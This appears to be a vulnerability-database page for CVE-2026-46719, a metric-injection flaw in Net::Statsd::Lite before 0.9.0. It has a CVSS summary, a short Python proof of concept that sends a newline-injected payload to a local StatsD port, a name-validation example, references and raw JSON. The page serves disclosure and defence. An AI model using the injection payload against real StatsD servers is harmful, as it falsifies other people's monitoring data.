Security Vulnerability Report
CVE-2026-46719 CVSS 6.5 MEDIUM

CVE-2026-46719

Published: 2026-05-16 14:16:38
Last Modified: 2026-05-19 14:16:47
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Net::Statsd::Lite versions before 0.9.0 for Perl allowed metric injections. The metric names were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Net::Statsd::Lite < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# PoC for CVE-2026-46719: Net::Statsd::Lite Metric Injection
# Description: This script demonstrates how a newline character in a metric name
# can inject a second, arbitrary metric into the StatsD server.

STATSD_HOST = '127.0.0.1'
STATSD_PORT = 8125

# The vulnerable component allows newlines, colons, and pipes in the metric name.
# Payload breakdown:
# 'legit_metric:1|c'      -> The legitimate metric the app intends to send.
# '\n'                    -> The newline separator that breaks the protocol.
# 'injected_metric:666|c' -> The malicious metric injected by the attacker.
payload = b"legit_metric:1|c\ninjected_metric:666|c"

print(f"[*] Sending payload to {STATSD_HOST}:{STATSD_PORT}")
print(f"[*] Payload content: {payload}")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (STATSD_HOST, STATSD_PORT))
sock.close()

print("[+] Payload sent successfully. Check StatsD for 'injected_metric'.")
```
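For callers that build metric names from untrusted input, the check the description says was missing can be applied before a name reaches the client. The following is an added example, not code from this page or from Net::Statsd::Lite, and it is written in Python rather than the module's Perl. The function names are hypothetical, the sample name is constructed, and rejecting "\r" alongside the newline, colon and pipe named in the description is an assumption.

```python
import re

# Characters with structural meaning in a StatsD line "<name>:<value>|<type>";
# "\n" separates metrics within one datagram. "\r" is rejected too (assumption).
_FORBIDDEN = re.compile(r"[\r\n:|]")


def format_unchecked(name, value, mtype="c"):
    """Behaviour the advisory describes: the name is used verbatim."""
    return f"{name}:{value}|{mtype}"


def format_checked(name, value, mtype="c"):
    """Refuse names that would change the structure of the line."""
    if not name or _FORBIDDEN.search(name):
        raise ValueError(f"invalid StatsD metric name: {name!r}")
    return f"{name}:{value}|{mtype}"


def parse_datagram(data):
    """Split a datagram as a StatsD server does: one metric per line."""
    metrics = []
    for line in data.split("\n"):
        if not line:
            continue
        name, _, rest = line.partition(":")
        value, _, mtype = rest.partition("|")
        metrics.append((name, value, mtype))
    return metrics


# Constructed sample: a metric name derived from an untrusted field.
UNTRUSTED_NAME = "legit_metric:1|c\ninjected_metric"


def demo():
    """Return what the server would record, and whether the check rejects it."""
    seen = parse_datagram(format_unchecked(UNTRUSTED_NAME, 1))
    try:
        format_checked(UNTRUSTED_NAME, 1)
        rejected = False
    except ValueError:
        rejected = True
    return seen, rejected


if __name__ == "__main__":
    print(demo())
```

Rejecting the name outright, rather than silently stripping characters, keeps two distinct untrusted names from collapsing into the same metric.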

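References

https://github.com/robrwo/Net-Statsd-Lite/commit/e1a8ab866d75c2827982134e9cf7e51a7f771153.patch
https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.9.0/changes
http://www.openwall.com/lists/oss-security/2026/05/16/9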

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46719", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-16T14:16:37.507", "lastModified": "2026-05-19T14:16:47.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::Statsd::Lite versions before 0.9.0 for Perl allowed metric injections.\n\nThe metric names were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://github.com/robrwo/Net-Statsd-Lite/commit/e1a8ab866d75c2827982134e9cf7e51a7f771153.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.9.0/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/16/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}